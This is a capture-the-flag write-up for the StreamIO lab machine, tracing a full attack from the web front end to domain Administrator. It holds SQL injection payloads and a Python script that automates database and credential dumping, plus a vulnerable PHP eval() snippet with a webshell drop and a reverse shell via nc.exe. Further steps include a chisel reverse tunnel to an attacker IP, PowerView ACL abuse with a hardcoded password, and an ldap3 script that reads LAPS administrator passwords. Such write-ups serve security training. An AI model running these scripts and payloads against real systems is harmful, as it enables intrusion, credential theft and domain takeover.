
# StreamIO

## Gaining Access

Nmap Scan:

<figure><img src="/files/9odmzKmmMpk0IlDPiBNB" alt=""><figcaption></figcaption></figure>

### HTTPS Cert

On port 443, we can head to the website to find some kind of streaming platform.

<figure><img src="/files/FfE32jmldpJtsCdN2d3S" alt=""><figcaption></figcaption></figure>

Checking the TLS certificate, we can find another domain name:

<figure><img src="/files/HNMCCHSB82iQAxq3Ui6F" alt=""><figcaption></figcaption></figure>

We can add this domain to our `/etc/hosts` file. Another notable thing we found was the login function on the main domain.

### SQL Injection

The new domain leads us to a different website.

<figure><img src="/files/ClNV08JLGU2ajrJI3oV2" alt=""><figcaption></figcaption></figure>

The page is written in PHP (visiting `index.php` brings us to the home page), so we can fuzz for endpoints with the `.php` extension using gobuster's `-x php` flag.

<figure><img src="/files/pKcQlLLoF9vvp1X8dDPd" alt=""><figcaption></figcaption></figure>

Within `search.php`, we can find a query function.

<figure><img src="/files/Vkwapf9IUvKBIQi57NC5" alt=""><figcaption></figcaption></figure>

This was vulnerable to SQL injection: the payload `a' union select 1,2,3,4,5,6;-- -` works, which tells us the original query selects six columns and shows which of them are rendered back in the results. From here, we can enumerate the databases, tables and users through a rendered column.

<figure><img src="/files/KNeA18HYFnw9BHLQiOjS" alt=""><figcaption></figcaption></figure>

Using the STREAMIO database, we can dump out the tables present:

<figure><img src="/files/YyzIifOwWJz47lzKaUTg" alt=""><figcaption></figcaption></figure>

Then, we can take a look at the users table. This can be done using `a' union select 1, concat(username, ':', password), 3,4,5,6 from users; -- -`.

<figure><img src="/files/sNh9r5QRsml3fVzYK8LY" alt=""><figcaption></figcaption></figure>
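As an added example (this is not the writeup's own code), the enumeration steps above automated in Python. It assumes the search term is POSTed to `search.php` in a parameter named `q`, and the host name in `SEARCH_URL` is a placeholder for the vhost taken from the certificate; the writeup states neither. The six-column layout and the rendered column come from the payloads shown above, and the catalog queries are MSSQL-specific because the backend turns out to be MSSQL (port 1433 and `mssqlclient.py` later in the writeup). The detail worth copying is the marker `concat()`, which lets the injected values be picked out of the HTML regardless of what the page renders around them.

```python
import re
import ssl
import urllib.parse
import urllib.request

# Assumed (not stated in the writeup): the search term is POSTed as "q", and the
# host below is a placeholder for the vhost found in the certificate.
SEARCH_URL = "https://second-vhost.example/search.php"
SEARCH_PARAM = "q"
N_COLS = 6          # from the page: "a' union select 1,2,3,4,5,6;-- -" works
RENDERED_COL = 2    # from the page: concat(...) placed in column 2 is echoed back
START, END = "QzQz", "zQzQ"   # markers so injected values can be found in the HTML


def build_union_payload(expr: str, from_clause: str = "",
                        n_cols: int = N_COLS, col: int = RENDERED_COL) -> str:
    """Build a UNION payload that echoes <expr> (one value per row) in the rendered column.

    The marker concat() keeps the injected values distinguishable from genuine
    search results and from the placeholder integers in the other columns.
    """
    cols = [str(i) for i in range(1, n_cols + 1)]
    cols[col - 1] = f"concat('{START}',{expr},'{END}')"
    tail = f" {from_clause}" if from_clause else ""
    return f"a' union select {','.join(cols)}{tail}-- -"


def extract_injected(html: str) -> list[str]:
    """Pull every marker-delimited value out of a response body."""
    return re.findall(re.escape(START) + r"(.*?)" + re.escape(END), html, re.S)


def inject(expr: str, from_clause: str = "") -> list[str]:
    """Send one payload to search.php and return the echoed values."""
    body = urllib.parse.urlencode({SEARCH_PARAM: build_union_payload(expr, from_clause)}).encode()
    ctx = ssl._create_unverified_context()  # lab box with a self-signed certificate
    with urllib.request.urlopen(SEARCH_URL, data=body, context=ctx, timeout=15) as resp:
        return extract_injected(resp.read().decode(errors="replace"))


# The enumeration chain the writeup walks through by hand, using MSSQL's catalog views.
def enum_databases() -> list[str]:
    return inject("name", "from master..sysdatabases")


def enum_tables(db: str) -> list[str]:
    return inject("table_name", f"from {db}.information_schema.tables")


def enum_columns(db: str, table: str) -> list[str]:
    return inject("column_name",
                  f"from {db}.information_schema.columns where table_name='{table}'")


def dump_users() -> list[str]:
    # Same query as the page's manual payload: one "username:hash" per row
    return inject("concat(username,':',password)", "from users")


if __name__ == "__main__":
    for db in enum_databases():
        print("[db]", db)
    for t in enum_tables("STREAMIO"):
        print("[table]", t)
    for c in enum_columns("STREAMIO", "users"):
        print("[column]", c)
    for row in dump_users():
        print("[user]", row)
```

`concat()` needs SQL Server 2012 or later; on older instances the same payloads work with `+` and explicit casts instead. Each `inject()` call returns one value per row, so the multi-row `users` dump comes back in a single request.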

After collecting all the credentials, we can crack the hashes and then spray the resulting passwords against the `login.php` page we found earlier on `streamio.htb`. The password for `yoshihide` works!

### Debug Fuzz

Within the admin dashboard, a few of the functions pass a `?staff=` parameter in the URL.

<figure><img src="/files/sQ721HHNxHblCL1mKe17" alt=""><figcaption></figcaption></figure>

I found this rather interesting and wanted to fuzz it further. Fuzzing the parameter name with `wfuzz`, I was able to find another parameter, `debug`.

<figure><img src="/files/HkBrB52FHm2C5AWe4cPy" alt=""><figcaption></figcaption></figure>

I also used `gobuster` to see what other files were present in this directory.

<figure><img src="/files/17etnc1IZwO5FHjXzWGG" alt=""><figcaption></figcaption></figure>

`master.php` stood out.

### Eval RCE

Within the debug page, there isn't much visual difference apart from one line:

<figure><img src="/files/TqEXxSyjUFC39Wx3VoEN" alt=""><figcaption></figcaption></figure>

Because this page is PHP, I tested the `debug` parameter with the common `php://filter/convert.base64-encode/resource=<file>` LFI trick, which makes the include return a file's base64-encoded source instead of executing it, and this worked!

<figure><img src="/files/sZnalAiP1isp1C6r7UsR" alt=""><figcaption></figcaption></figure>

We can then take a look at that `master.php` file we found earlier. The last bit was the most interesting.

```php
<?php
if(isset($_POST['include']))
{
    if($_POST['include'] !== "index.php" ) 
        eval(file_get_contents($_POST['include']));
    else
        echo(" ---- ERROR ---- ");
}
?> 
```

`eval()` runs whatever `file_get_contents()` returns for the attacker-supplied `include` value, and the only check is that the value is not the literal string `index.php`. Since `file_get_contents()` accepts PHP stream wrappers as well as file paths, we fully control the code that gets evaluated. To construct the attack, we can base64-encode a small payload that drops a `cmd.php` webshell and send it via a POST request with an `include` parameter.

We can send this request here:

<figure><img src="/files/qloe4AU8XdFZZEsUEAOd" alt=""><figcaption></figcaption></figure>

And we finally have RCE on the machine. Then, we can gain a reverse shell via `nc.exe`.

<figure><img src="/files/WFwhK2O5WHD3RpuFgEB7" alt=""><figcaption></figcaption></figure>

## Privilege Escalation

We don't have much control over the machine with this user, so we need to find another.

### MSSQL

When checking `netstat`, we can find a service listening on port 1433 (MSSQL) bound to localhost, which is why it was not visible from our Kali machine in the earlier scan.

<figure><img src="/files/Yij7Rfu5JahT8zTf9CNO" alt=""><figcaption></figcaption></figure>

We can also look through the `inetpub` web root for credentials, and we find database connection details in `index.php`:

<figure><img src="/files/F7RpcKKhk9zAKWznGM97" alt=""><figcaption></figcaption></figure>

We can then forward the port to Kali via `chisel`, as a reverse tunnel since the victim has to connect out to us:

```bash
# on Kali: chisel server on 8000, allowing clients to open reverse tunnels
./chisel server -p 8000 --reverse

# on Victim: connect back and expose the local MSSQL port as 127.0.0.1:1433 on Kali
.\chisel.exe client 10.10.16.12:8000 R:1433:127.0.0.1:1433
```

Using `mssqlclient.py` against the forwarded port, we can access the database with the credentials we found.

<figure><img src="/files/8hMoz8YauoFynbtvcf3I" alt=""><figcaption></figcaption></figure>

I took a look at the `streamio_backup` database and found credentials for a `nikk37` user.

<figure><img src="/files/SjblBzmpHyF5SlHHcJXC" alt=""><figcaption></figcaption></figure>

The hash can be cracked via CrackStation.

<figure><img src="/files/QNmwywM3wzdOBGnljw3W" alt=""><figcaption></figcaption></figure>

Then, we can `evil-winrm` in as this user:

<figure><img src="/files/NqrG8mZoa3MGEYLPxqvt" alt=""><figcaption></figcaption></figure>

### Firefox Passwords + Bloodhound

When I ran WinPEAS on this machine, it picked up on a Firefox profile with saved credentials. We can use `firepwd.py` to decrypt them; it needs the profile's `logins.json` together with the key database it sits next to (`key4.db`, or `key3.db` on older Firefox versions), because the stored passwords are encrypted with a key kept there.

<figure><img src="/files/PVWEPtiAz4FcIPS7ra3h" alt=""><figcaption></figcaption></figure>

{% embed url="<https://github.com/lclevy/firepwd/blob/master/firepwd.py>" %}

Upon decrypting the `logins.json` file, we can find some more passwords.

<figure><img src="/files/5xzjnvWCfIUdqFfdLrcC" alt=""><figcaption></figcaption></figure>

Since we had domain credentials, I also ran `bloodhound-python` to enumerate the objects within the domain.

<figure><img src="/files/Ye4RgYKD0YBdoRYVfwpK" alt=""><figcaption></figcaption></figure>

We found that the `jdgodd` user had some permissions over the Core Staff group.

<figure><img src="/files/oC7J1fw7OWIEM37rrM0V" alt=""><figcaption></figcaption></figure>

And members of Core Staff had `ReadLAPSPassword` over the DC, i.e. the right to read the `ms-Mcs-AdmPwd` attribute on the DC's computer object, which holds its LAPS-managed local Administrator password.

<figure><img src="/files/fZPAHAUhXuJgkwhYhCZs" alt=""><figcaption></figcaption></figure>

### ReadLAPSPassword

To exploit this, we first need to add the `jdgodd` user to the Core Staff group, and then read the Administrator password.

The adding can be done via remote PowerShell and PowerView, using the credentials for `jdgodd` we recovered from the Firefox profile earlier.

```powershell
# Authenticate as JDgodd with the password recovered from Firefox
$SecPassword = ConvertTo-SecureString 'JDg0dd1s@d0p3cr3@t0r' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('streamio\JDgodd', $SecPassword)
# Use JDgodd's rights over the group to grant himself full control of it (PowerView's -Rights defaults to All)
Add-DomainObjectAcl -Credential $Cred -TargetIdentity "Core Staff" -PrincipalIdentity "streamio\JDgodd"
# Now add JDgodd to Core Staff, which carries ReadLAPSPassword over the DC
Add-DomainGroupMember -Identity "Core Staff" -Members 'streamio\JDgodd' -Credential $Cred
```

<figure><img src="/files/72n7wOBdO8WV2BwYzUMm" alt=""><figcaption></figcaption></figure>

Afterwards, we can use crackmapexec's `laps` module to read the LAPS password over LDAP.

<figure><img src="/files/FbjRLVfkWaIrIDXXaeEC" alt=""><figcaption></figcaption></figure>
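What the crackmapexec module does underneath, as an added example (not the writeup's code): bind to LDAP as the now-Core Staff user and read `ms-Mcs-AdmPwd` straight off the computer objects. It assumes the `ldap3` package, the DC host name `dc.streamio.htb` and the base DN `DC=streamio,DC=htb`, none of which the writeup gives. Two caveats it encodes: the search filter only matches computers whose password attribute the caller may read, so an empty result after a successful bind means missing rights rather than missing LAPS; and `ms-Mcs-AdmPwdExpirationTime` is a Windows FILETIME, which tells you whether the password you pulled is about to be rotated.

```python
from datetime import datetime, timedelta, timezone
from typing import Optional

# Assumed (not stated in the writeup): DC host name and base DN, and that ldap3 is installed.
DC_HOST = "dc.streamio.htb"
BASE_DN = "DC=streamio,DC=htb"
LAPS_ATTRS = ["sAMAccountName", "ms-Mcs-AdmPwd", "ms-Mcs-AdmPwdExpirationTime"]


def filetime_to_datetime(ft: int) -> datetime:
    """ms-Mcs-AdmPwdExpirationTime is a Windows FILETIME: 100 ns ticks since 1601-01-01 UTC."""
    return datetime(1601, 1, 1, tzinfo=timezone.utc) + timedelta(microseconds=int(ft) // 10)


def summarize(computer: str, password: str, expiration_ft,
              now: Optional[datetime] = None) -> dict:
    """Normalise one LDAP result and flag a password that LAPS is due to rotate."""
    now = now or datetime.now(timezone.utc)
    expires = filetime_to_datetime(expiration_ft) if expiration_ft else None
    return {
        "computer": computer,
        "password": password,
        "expires": expires,
        "expired": expires is not None and expires < now,
    }


def read_laps(user: str, password: str, host: str = DC_HOST, base_dn: str = BASE_DN) -> list:
    """Bind with NTLM (user as DOMAIN\\name) and read every LAPS password the DACL lets us see.

    The (ms-Mcs-AdmPwd=*) filter only matches objects whose attribute we are
    allowed to read, so an empty list after a successful bind means "no
    ReadLAPSPassword right", not "LAPS is not deployed".
    """
    from ldap3 import ALL, NTLM, Connection, Server   # lazy: only needed for a live query
    server = Server(host, get_info=ALL)
    conn = Connection(server, user=user, password=password, authentication=NTLM, auto_bind=True)
    conn.search(base_dn, "(&(objectClass=computer)(ms-Mcs-AdmPwd=*))", attributes=LAPS_ATTRS)
    return [
        summarize(str(e["sAMAccountName"].value), str(e["ms-Mcs-AdmPwd"].value),
                  e["ms-Mcs-AdmPwdExpirationTime"].value)
        for e in conn.entries
    ]


if __name__ == "__main__":
    for r in read_laps("streamio\\JDgodd", "JDg0dd1s@d0p3cr3@t0r"):
        print(f"{r['computer']}: {r['password']}  (expires {r['expires']}, expired={r['expired']})")
```

The same read works with the legacy LAPS attributes only; Windows LAPS (2023 onwards) stores the password in `msLAPS-Password` (and encrypted in `msLAPS-EncryptedPassword`), so on a newer domain the attribute list needs changing.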

Then, we can `evil-winrm` in as the Administrator with that password.

<figure><img src="/files/ow1XPIPpO2ue0UY9Ix2w" alt=""><figcaption></figcaption></figure>

